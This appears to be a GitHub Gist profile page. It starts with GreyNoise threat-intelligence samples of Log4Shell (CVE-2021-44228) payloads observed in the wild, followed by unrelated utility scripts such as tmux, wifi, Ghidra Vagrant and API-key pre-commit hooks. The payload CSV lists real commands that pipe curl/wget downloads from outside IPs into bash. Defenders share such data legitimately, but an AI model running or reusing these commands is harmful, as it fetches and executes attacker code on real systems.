Skip to content

Instantly share code, notes, and snippets.

Avatar

nate nathanqthai

View GitHub Profile
@nathanqthai
nathanqthai / payload_samples.md
Last active May 2, 2022
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence
View payload_samples.md

Samples

Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise have observed.

These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.

Examples

The follow section includes Log4Shell samples seen in the wild

URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

@nathanqthai
nathanqthai / base64_payloads.csv
Last active Mar 18, 2022
GreyNoise Log4Shell Payloads
View base64_payloads.csv
b64decoded hits
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash 2056
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash 162
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash 2
View cve_facets.py
#!/usr/bin/env python3
# vim: set ts=4 sw=4 ts=4 et :
import argparse
import logging
import time
import greynoise
import collections
@nathanqthai
nathanqthai / dashboard.sh
Created Jul 11, 2019
an example of a tmux workspace setup script
View dashboard.sh
#!/bin/sh
session="dash$$"
# code editor
tmux new-session -d -s $session
tmux send-keys 'vim' Enter
tmux split-window -h -p 40
tmux send-keys 'htop' Enter
@nathanqthai
nathanqthai / wifi.sh
Created May 22, 2019
connect to wifi
View wifi.sh
#!/bin/sh
INTERFACE='wlp5s0'
[ "`whoami`" = root ] || exec sudo "$0" "$@"
wpa_supplicant -B -i ${INTERFACE} -c /etc/wpa_supplicant.conf -D nl80211,wext
dhclient -r ${INTERFACE}
dhclient ${INTERFACE}
@nathanqthai
nathanqthai / mdless.sh
Created May 16, 2019
CLI preview for Markdown editing
View mdless.sh
# sudo apt install ruby inotify-tools
# gem install mdless
# https://github.com/ttscoff/mdless
# refreshing preview of markdown files
mdlive() {
while true; do
inotifywait -q -e close_write $1;
clear;
@nathanqthai
nathanqthai / Vagrantfile
Last active May 16, 2019
A Vagrantfile for provisioning a VM with Ghidra and X11 forwarding enabled.
View Vagrantfile
# -*- mode: ruby -*-
# vi: set ft=ruby :
Vagrant.configure("2") do |config|
# ubuntu 18.04 lts
config.vm.box = "ubuntu/bionic64"
# https://ghidra-sre.org/InstallationGuide.html#Requirements
config.vm.provider "virtualbox" do |v|
v.memory = 4096
@nathanqthai
nathanqthai / pre-commit.sh
Last active Mar 20, 2019
a git pre-commit hook to check for API keys
View pre-commit.sh
#!/bin/sh
# stash before we mess around
STASH_NAME="pre-commit-$(date +%s)"
git stash save -q --keep-index $STASH_NAME
# regexes to find keys
TWILIO_KEY="\bAC[a-z0-9]{32}\b"
TWILIO_SECRET="\b[a-z0-9]{32}\b"
API_REGEXPS=( $TWILIO_KEY $TWILIO_SECRET )
@nathanqthai
nathanqthai / 38khz_adc.ino
Created Sep 24, 2017
idk im a dumpster fire atm
View 38khz_adc.ino
void setup() {
Serial.begin(115200); // use the serial port
TIMSK0 = 0; // turn off timer0 for lower jitter - delay() and millis() killed
ADCSRA = 0xe5; // set the adc to free running mode
ADMUX = 0x40; // use adc0
DIDR0 = 0x01; // turn off the digital input for adc0
}
void loop() {
byte buf[256];
@nathanqthai
nathanqthai / readme.txt
Last active Aug 31, 2017
simple tornado server with ssl
View readme.txt
to generate example certs
openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout host.key -out host.crt
run server:
chmod +x server.py
./server.py
test server:
openssl s_client -connect localhost:8888